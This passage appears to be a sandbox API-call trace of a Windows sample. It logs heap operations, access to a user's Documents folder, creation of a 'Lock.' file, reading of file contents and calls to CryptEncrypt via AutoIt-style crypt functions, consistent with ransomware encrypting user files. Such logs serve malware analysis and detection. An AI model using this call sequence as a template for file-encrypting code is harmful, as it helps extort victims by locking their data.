Size=0x10) returned 0x2e516e8 [0264.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0264.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0264.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0264.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0264.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.479] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.J30FxxC-.doc" (normalized: "c:\\users\\fd1hvy\\documents\\lock.j30fxxc-.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0264.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0264.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.480] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.480] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0264.481] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0264.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0264.482] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1254020 [0264.498] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0264.498] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xf8af, lpOverlapped=0x0) returned 1 [0264.502] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0264.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8af) returned 0x2f16018 [0264.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1254020 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8af) returned 0x2f258d0 [0264.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.513] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.513] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8af) returned 0x2f16018 [0264.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0264.515] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d68 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf8af) returned 0x2f16018 [0264.515] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0264.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.516] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.517] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.518] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.518] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.518] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.518] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.518] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.518] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.519] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.519] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.519] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.522] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51cb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.525] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.525] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf8af, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf8b0) returned 1 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0264.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: 